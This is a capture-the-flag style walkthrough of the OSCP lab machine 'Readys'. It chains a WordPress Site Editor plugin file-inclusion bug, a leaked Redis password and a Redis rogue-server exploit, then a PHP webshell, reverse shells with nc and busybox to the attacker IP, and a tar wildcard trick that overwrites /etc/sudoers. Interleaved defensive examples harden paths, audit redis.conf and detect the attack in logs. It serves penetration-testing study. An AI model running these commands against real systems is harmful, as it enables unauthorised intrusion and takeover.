静静

OSCP Official Lab: Readys Walkthrough

Follow the 泷羽Sec-静安 public account (泷羽Sec), which regularly publishes articles on OSCP, penetration testing and related topics to help you keep up with developments in cyber security. Reply "OSCP配套工具" to the account to get the tools used in this article.

Start the machine from the official site

Information gathering

# Kali attacker address
192.168.45.182
# Target address
192.168.147.166

Port and directory scanning

# Set the MTU on the VPN interface
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# Scan all ports and collect the open ones into a comma-separated list
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.166 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# Service and version scan of the open ports
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
# Directory enumeration and web fingerprinting
gobuster dir -e -u http://192.168.147.166 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.147.166/
wpscan --update --url http://192.168.147.166/ --enumerate ap,t,u --api-token XXX

Scan results:

┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ echo $ports
22,80,6379

┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:12 EDT
Nmap scan report for 192.168.147.166
Host is up (0.12s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Readys – Just another WordPress site
|_http-generator: WordPress 5.7.2
|_http-server-header: Apache/2.4.38 (Debian)
6379/tcp open  redis   Redis key-value store
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.97 seconds

┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:18 EDT
Nmap scan report for 192.168.147.166
Host is up (0.12s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.147.166
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.147.166:80/
|     Form id: search-form-1
|     Form action: http://192.168.147.166/
|
|     Path: http://192.168.147.166:80/index.php/category/uncategorised/
|     Form id: search-form-1
|     Form action: http://192.168.147.166/
|
|     Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com">Gravatar</a>.]]
|     Form id: search-form-2
|     Form action: http://192.168.147.166/
|
|     Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com">Gravatar</a>.]]
|     Form id: search-form-1
|_    Form action: http://192.168.147.166/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter:
|
|     Couldn't find a file-type field.
|
|_    Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum:
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 5.7.2
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
6379/tcp open  redis

Nmap done: 1 IP address (1 host up) scanned in 118.67 seconds


┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ whatweb http://192.168.147.166/
http://192.168.147.166/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.147.166], JQuery[3.5.1], MetaGenerator[WordPress 5.7.2], PoweredBy[--], Script[text/javascript], Title[Readys – Just another WordPress site], UncommonHeaders[link], WordPress[5.7.2]

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 323] [--> http://192.168.147.166/wp-content/]
/wp-includes          (Status: 301) [Size: 324] [--> http://192.168.147.166/wp-includes/]
/wp-admin             (Status: 301) [Size: 321] [--> http://192.168.147.166/wp-admin/]

The username admin exists, but its password could not be brute-forced.

Site Editor plugin vulnerability

 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - https://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2

Exploitation succeeds and reveals a user named alice. Following the usual layout of these machines, alice's home directory should contain a flag, normally named local.txt, and root's home contains proof.txt. I wanted to read the SSH private keys directly, copy them and log in, but the key files could not be read, so the only thing left was to look at the Redis configuration.

# files requested through the LFI
/root/.ssh/id_rsa
/home/alice/.ssh/id_rsa
/etc/redis/redis.conf
# redis.conf saved locally as 166redis.conf; look for the auth directive
cat 166redis.conf | grep "requirepass"
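The plugin bug above comes down to an include path that is taken from the request and never checked against the directory the feature is meant to serve. The following is an added example, not code from the post or from the Site Editor plugin: the unsafe shape of that path handling next to a hardened version that canonicalises the path and proves it stays inside an allow-listed base directory. The base directory /srv/example-plugin and the .php suffix allow-list are assumptions for the demonstration.

```python
"""Added example (not from the post or the Site Editor plugin): include-path
handling shown in its unsafe form and in a hardened form.
/srv/example-plugin is a hypothetical stand-in for the plugin directory."""
import os

ALLOWED_SUFFIX = ".php"   # assumed: the feature only needs to load pattern templates


class PathOutsideBase(ValueError):
    """Raised when a requested include does not stay inside the allowed directory."""


def resolve_include_unsafe(base_dir, user_path):
    """The vulnerable shape: whatever the client sends is joined and included.
    os.path.join discards base_dir when user_path is absolute, and '..' segments
    are never checked, so /etc/redis/redis.conf or ../../wp-config.php both pass."""
    return os.path.normpath(os.path.join(base_dir, user_path))


def resolve_include(base_dir, user_path):
    """Hardened shape: canonicalise, then prove the result is still under base_dir."""
    base = os.path.realpath(base_dir)
    # absolute input and embedded NUL bytes are rejected before any path math
    if os.path.isabs(user_path) or "\x00" in user_path:
        raise PathOutsideBase(user_path)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath is the containment check; a plain startswith(base) would accept
    # /srv/example-plugin-evil/x.php as being "inside" /srv/example-plugin
    if os.path.commonpath([base, candidate]) != base:
        raise PathOutsideBase(user_path)
    # even inside the directory, only the file type the feature needs is allowed
    if not candidate.endswith(ALLOWED_SUFFIX):
        raise PathOutsideBase(user_path)
    return candidate


def is_allowed(base_dir, user_path):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        resolve_include(base_dir, user_path)
        return True
    except PathOutsideBase:
        return False


if __name__ == "__main__":
    base = "/srv/example-plugin"
    probes = [
        "patterns/default.php",          # legitimate template
        "/etc/redis/redis.conf",         # the absolute path read in the writeup
        "../../wp-config.php",           # traversal out of the plugin directory
        "../example-plugin-evil/x.php",  # prefix trick that defeats startswith()
        "patterns/notes.txt",            # inside the directory but wrong file type
    ]
    for p in probes:
        print(f"{p!r:34} unsafe -> {resolve_include_unsafe(base, p):38} hardened -> {is_allowed(base, p)}")
```

The unsafe resolver hands back exactly the paths the writeup reads through the LFI; the hardened one rejects every probe except the in-directory template, and it does so on the canonical path, so symlinks and encoded traversal are caught as well.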

This gives the Redis authentication password, Ready4Redis?

# authenticate against the remote Redis and confirm the server details
redis-cli -h 192.168.147.166 -a 'Ready4Redis?'
info server

Redis RCE: reverse shell

git clone https://hk.gh-proxy.com/https://github.com/n0b0dyCN/redis-rogue-server.git
git clone https://hk.gh-proxy.com/https://github.com/Ridter/redis-rce.git
cd redis-rce
cp ../redis-rogue-server/exp.so .
# in a new terminal, wait for the reverse shell
rlwrap -cAr nc -nlvp 80
# run the RCE script
python redis-rce.py -r 192.168.147.166 -L 192.168.45.182 -P 6379 -f exp.so -a 'Ready4Redis?'
# on the target, once the shell connects back: upgrade to a pty
python3 -c 'import pty;pty.spawn("/bin/bash")'
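The rogue-server technique only works because three things line up on this box: Redis is reachable from the attacker, the password is short enough to survive a config leak, and MODULE LOAD is still available to an authenticated client. As an added example, not from the post and not Redis's own tooling, here is a small redis.conf auditor that flags exactly those settings, with a constructed weak config next to a constructed hardened one. The 16-character minimum is an assumed local policy, and the enable-module-command check covers the Redis 7 directive while rename-command covers older versions.

```python
"""Added example (not from the post, not Redis's own tooling): audit a redis.conf
for the settings that let a rogue-server MODULE LOAD attack succeed.
Both configs below are constructed for illustration."""

MIN_PASSWORD_LEN = 16                      # assumed local policy, not a Redis requirement
WILDCARD_BINDS = {"0.0.0.0", "::", "*"}    # bind values that expose the port to every interface

WEAK_CONF = """\
# constructed: a stock Debian redis.conf edited to accept remote clients
port 6379
protected-mode no
requirepass Ready4Redis?
dir /run/redis
"""

HARDENED_CONF = """\
# constructed: same service, local only, long secret, dangerous commands disabled
bind 127.0.0.1
protected-mode yes
requirepass CHANGE-ME-long-random-secret-0123456789
rename-command MODULE ""
rename-command CONFIG ""
rename-command DEBUG ""
"""


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of values seen, in file order."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def audit_redis_conf(text):
    """Return human-readable findings; an empty list means the checked settings are sane."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. network exposure: no bind directive, or a wildcard address
    bind_tokens = " ".join(conf.get("bind", [])).split()
    if not bind_tokens or any(t in WILDCARD_BINDS for t in bind_tokens):
        findings.append("bind: no bind directive or a wildcard address, Redis is reachable from the network")

    # 2. protected-mode defaults to yes, so only an explicit 'no' is a finding
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: remote clients are accepted even without bind or requirepass")

    # 3. authentication: absent, or shorter than the assumed minimum
    passwords = conf.get("requirepass", [])
    secret = passwords[-1].strip('"') if passwords else ""
    if not secret:
        findings.append("requirepass: absent, anyone who can reach the port has full access")
    elif len(secret) < MIN_PASSWORD_LEN:
        findings.append(f"requirepass: {len(secret)} characters, below the assumed minimum of {MIN_PASSWORD_LEN}")

    # 4. MODULE LOAD: disabled via rename-command (older Redis) or enable-module-command (Redis 7)
    renamed_away = {
        v.split()[0].upper()
        for v in conf.get("rename-command", [])
        if v.split() and v.endswith('""')
    }
    module_off = "MODULE" in renamed_away or conf.get("enable-module-command", [""])[-1].lower() == "no"
    if not module_off:
        findings.append("MODULE LOAD still available: an authenticated client can load a shared object into redis-server")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name} ==")
        for f in audit_redis_conf(text) or ["no findings"]:
            print(" -", f)
```

Run against the weak config the auditor reports all four gaps; against the hardened config it reports nothing. Binding to loopback alone would already have stopped the rogue server from reaching the instance, which is why the bind check comes first.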

Locating the database configuration

[!tip] Database credentials: karl Wordpress1234

Writable directories and a PHP one-liner webshell

The redis account we hold still cannot log in properly, so we need a real user. Look for writable directories and drop a PHP one-liner webshell into one of them. In each candidate directory, try writing echo "<?php phpinfo() ?>" > test.php; a file written to /run/redis is parsed as PHP when it is pulled in through the LFI, so then write the one-liner webshell: echo '<?php system($_GET["cmd"]); ?>' > test.php

# list writable directories up to five levels deep
find / -type d -maxdepth 5 -writable 2>/dev/null

# Kali: open a new listener
rlwrap -cAr nc -nlvp 443
# request the LFI URL: ajax_path includes the webshell, cmd carries the command
http://192.168.147.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/test.php&cmd=busybox%20nc%20192.168.45.182%20443%20-e%20sh
# the decoded command executed through the webshell
busybox nc 192.168.45.182 443 -e sh
# upgrade the shell to a pty
python3 -c 'import pty;pty.spawn("/bin/bash")'
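Every step of the file-read and webshell chain above leaves a line in the web server's access log: the vulnerable endpoint name, an ajax_path that is absolute or traverses upward, and a command parameter riding along with it. As an added example, not from the post, the detector below parses Apache combined-format lines and flags exactly those patterns. The log lines are constructed for the demonstration (TEST-NET address, invented sizes and user agents), and the command-parameter names in COMMAND_PARAMS are an assumption to extend for your own environment.

```python
"""Added example (not from the post): detection logic for abuse of the Site Editor
include endpoint, run over constructed Apache combined-format log lines."""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
VULN_SCRIPT = "ajax_shortcode_pattern.php"      # the endpoint from the writeup
COMMAND_PARAMS = {"cmd", "c", "exec"}           # assumed names; extend for your environment
STREAM_WRAPPERS = ("php://", "data:", "expect://", "file://", "phar://")

# constructed sample log; 192.0.2.10 is a documentation address, not a real client
SAMPLE_LOG = """\
192.0.2.10 - - [15/Oct/2025:05:40:01 +0000] "GET /index.php/category/uncategorised/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.10 - - [15/Oct/2025:05:41:12 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf HTTP/1.1" 200 1870 "-" "curl/8.4.0"
192.0.2.10 - - [15/Oct/2025:05:55:30 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/test.php&cmd=id HTTP/1.1" 200 96 "-" "curl/8.4.0"
192.0.2.10 - - [15/Oct/2025:05:56:00 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=patterns/default.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.10 - - [15/Oct/2025:05:57:45 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1311 "-" "curl/8.4.0"
"""


def classify_request(target):
    """Return the reasons a request target is suspicious; an empty list means clean."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_SCRIPT):
        return []
    # parse_qs percent-decodes, so ..%2F.. is seen as ../.. here
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for raw in params.get("ajax_path", []):
        if raw.startswith("/"):
            reasons.append("ajax_path is an absolute path")
        if ".." in raw:
            reasons.append("ajax_path contains '..' traversal")
        if raw.lower().startswith(STREAM_WRAPPERS):
            reasons.append("ajax_path uses a PHP stream wrapper")
    if COMMAND_PARAMS & set(params):
        reasons.append("command-style parameter present on the include endpoint")
    return reasons


def detect_lfi_abuse(lines):
    """Parse each log line and return one alert dict per suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        reasons = classify_request(m.group("target"))
        if reasons:
            alerts.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_lfi_abuse(SAMPLE_LOG.splitlines()):
        print(alert["ts"], alert["ip"], alert["status"], "; ".join(alert["reasons"]))
```

Only the legitimate in-directory request passes; the absolute read of redis.conf, the include of the dropped test.php with a cmd parameter, and the percent-encoded traversal each produce an alert. A 200 on any of these lines is the strongest signal, since the plugin returned content for a path it should never have served.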

Connecting to the database gives the WordPress admin password hash, but this password is of no further use for the privilege escalation that follows.

admin      | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 

Upload LinPEAS (小豌豆) to look for privilege-escalation vectors.

Reading /usr/local/bin/backup.sh shows that tar can be used for privilege escalation. See [[OSCP官方靶场-Amaterasu WP#Tar提权详解]]-CNSD for the details.

Tar privilege escalation

# target: create the checkpoint option files tar will pick up through the wildcard
cd /var/www/html
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh payload.sh'

# Kali: serve the payload
echo "echo 'alice ALL=(root) NOPASSWD: ALL' > /etc/sudoers" >payload.sh
chmod +x payload.sh
python3 -m http.server 8080

# target: fetch the payload, then use the new sudo rule once backup.sh has run
wget 192.168.45.182:8080/payload.sh
sudo -l
sudo /bin/bash
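The escalation works because the shell expands the wildcard before tar runs, so filenames that look like --checkpoint options are parsed as options by tar rather than archived as files. As an added example, not from the post (the post does not reproduce backup.sh itself), the checker below scans shell scripts for tar invocations that pass a bare glob before the end-of-options marker and rewrites them with --. The scripts it runs over are constructed.

```python
"""Added example (not from the post): static check for the tar wildcard pattern that
a checkpoint-action escalation abuses, plus a rewrite that inserts '--' so expanded
filenames can only ever be operands. The scripts below are constructed."""
import os
import shlex

GLOB_CHARS = ("*", "?", "[")

RISKY_SCRIPT = """\
#!/bin/bash
# constructed backup script with the unsafe wildcard
cd /var/www/html
tar -zcvf /var/backups/html.tgz *
"""

SAFE_SCRIPT = """\
#!/bin/bash
# constructed: three ways to archive the same directory without option injection
cd /var/www/html
tar -zcvf /var/backups/html.tgz -- *
tar -zcvf /var/backups/html2.tgz ./*
tar -zcvf /var/backups/html3.tgz -C /var/www/html .
"""


def _is_bare_glob(token):
    """True for an unquoted glob such as * or *.log that is neither an option nor ./-prefixed."""
    if token[:1] in ("'", '"', "-", "."):
        return False
    return any(c in token for c in GLOB_CHARS)


def _tar_tokens(line):
    """Tokenise a script line (quotes preserved) and return the tar argv, or None."""
    try:
        tokens = shlex.split(line, posix=False)
    except ValueError:
        return None  # unbalanced quotes; skip rather than guess
    if tokens and tokens[0] == "sudo":
        tokens = tokens[1:]
    if not tokens or os.path.basename(tokens[0]) != "tar":
        return None
    return tokens


def audit_tar_wildcards(script):
    """Return (line_number, line, glob_token) for every tar call with a bare glob before '--'."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        tokens = _tar_tokens(stripped)
        if tokens is None:
            continue
        end_of_options = tokens.index("--") if "--" in tokens else len(tokens)
        for idx in range(1, end_of_options):
            if _is_bare_glob(tokens[idx]):
                findings.append((lineno, stripped, tokens[idx]))
                break
    return findings


def harden_tar_line(line):
    """Insert '--' before the first bare glob so tar treats expanded names as operands."""
    tokens = _tar_tokens(line.strip())
    if tokens is None or "--" in tokens:
        return line
    for idx in range(1, len(tokens)):
        if _is_bare_glob(tokens[idx]):
            return " ".join(tokens[:idx] + ["--"] + tokens[idx:])
    return line


if __name__ == "__main__":
    for lineno, line, glob in audit_tar_wildcards(RISKY_SCRIPT):
        print(f"line {lineno}: bare glob {glob!r} in: {line}")
        print(f"  suggested: {harden_tar_line(line)}")
    print("safe script findings:", audit_tar_wildcards(SAFE_SCRIPT))
```

The -- rewrite keeps the shell's expansion but stops tar from reading any expanded name as an option; the -C dir . form avoids the glob altogether and is the better choice for a cron-driven backup, since it also survives a directory that users other than root can write to.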

Privilege escalation succeeds and the flag is obtained.

Summary

Intrusion path diagram

flowchart TD
    %% assets
    A[Kali attacker <br> 192.168.45.182]
    B[Target <br> 192.168.147.166]
    C[WP plugin site-editor LFI file read]
    D[Redis RCE]
    E[Combined file-read abuse to escalate to alice]
    F[Tar privilege escalation to root]

    %% path
    A-->|scan|B
    B-->C
    C-->D
    D-->E
    E-->F

    %% line types: --- solid, -.-> dashed, ==> thick
    %% -->|yes|: edge with label text
    %% node shapes: rectangle [ ], decision { }, rounded ( )
    %% style definitions
    classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
    classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
    classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
    %% edge style and colour (works on light and dark themes)
    linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;

    %% apply styles
    class A attack;
    class B,C,D public;
    class E,F internal;

Intrusion timeline

gantt
    title Attack timeline
    dateFormat  YYYY-MM-DD HH:mm
    axisFormat  %H:%M

    section Reconnaissance
    Target scanning              :a1, 2025-10-15 17:05, 2025-10-15 17:51
    Vulnerability identification :a2, after a1, 15m

    section Attack
    Initial access               :b1, after a2, 2025-10-15 19:05
    Privilege escalation         :crit, b2, after b1, 35m

    section Post-exploitation
    Data exfiltration            :c1, after b2, 5m
